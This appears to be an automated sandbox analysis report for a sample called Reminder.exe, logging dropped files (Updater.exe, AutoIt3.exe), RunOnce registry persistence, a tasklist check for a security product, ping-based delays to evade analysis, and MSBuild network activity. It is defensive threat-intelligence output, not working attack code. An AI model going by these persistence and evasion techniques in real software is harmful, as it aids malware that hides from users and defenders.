Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH

Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Reminder.exe

Static file information: File size 5563800 > 1048576

Source: Reminder.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

35_2_006E310D

Source: Reminder.exe	Static PE information: real checksum: 0x5560c0 should be: 0x553d7f
Source: Reminder.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x343f79
Source: Reminder.tmp.2.dr	Static PE information: real checksum: 0x0 should be: 0x343f79

Source: Reminder.exe	Static PE information: section name: .didata
Source: Reminder.tmp.0.dr	Static PE information: section name: .didata
Source: Reminder.tmp.2.dr	Static PE information: section name: .didata

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F1046 push ecx; ret	35_2_006F1059
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B815D push 014B81A0h; ret	35_2_014B8198
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B815C push 014B81A0h; ret	35_2_014B8198
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B810D push 014B8139h; ret	35_2_014B8131
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B8105 push 014B8139h; ret	35_2_014B8131
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A236D push 014A23BEh; ret	35_2_014A23B6
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A4291 push ecx; mov dword ptr [esp], eax	35_2_014A4292
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A25ED push 014A2619h; ret	35_2_014A2611
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B858D push 014B85D0h; ret	35_2_014B85C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B858C push 014B85D0h; ret	35_2_014B85C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A25B5 push 014A25E1h; ret	35_2_014A25D9
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B2723 push 014B27D0h; ret	35_2_014B27C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B2725 push 014B27D0h; ret	35_2_014B27C8
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B27D5 push 014B2865h; ret	35_2_014B285D
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B67FD push 014B6829h; ret	35_2_014B6821
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B67A5 push 014B67F1h; ret	35_2_014B67E9
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B694B push 014B6979h; ret	35_2_014B6971
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B694D push 014B6979h; ret	35_2_014B6971
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B496D push 014B4999h; ret	35_2_014B4991
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B8971 push 014B899Dh; ret	35_2_014B8995
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B6985 push 014B69B1h; ret	35_2_014B69A9
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B686D push 014B6899h; ret	35_2_014B6891
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A287D push 014A28A9h; ret	35_2_014A28A1
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B6835 push 014B6861h; ret	35_2_014B6859
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B68DD push 014B6909h; ret	35_2_014B6901
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B68A5 push 014B68D1h; ret	35_2_014B68C9
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A28B6 push 014A2BB9h; ret	35_2_014A2BB1
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B4B69 push 014B4B95h; ret	35_2_014B4B8D
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B4B31 push 014B4B5Dh; ret	35_2_014B4B55
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B4BDA push 014B4C25h; ret	35_2_014B4C1D
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B4BF9 push 014B4C25h; ret	35_2_014B4C1D

Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	File created: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Reminder.exe	File created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	File created: C:\Users\user\AppData\Local\friend\Updater.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	File created: C:\Users\user\AppData\Local\friend\is-SBSAG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	File created: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\friend\Updater.exe	File created: C:\edgheaa\AutoIt3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Reminder.exe	File created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcd	Jump to behavior

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00762558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	35_2_00762558
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006E5D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	35_2_006E5D03
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00D02558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	38_2_00D02558
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C85D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	38_2_00C85D03

Source: C:\Users\user\Desktop\Reminder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Window / User API: threadDelayed 1106

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\friend\Updater.exe	API coverage: 5.7 %
Source: C:\edgheaa\AutoIt3.exe	API coverage: 5.7 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 1.3 %

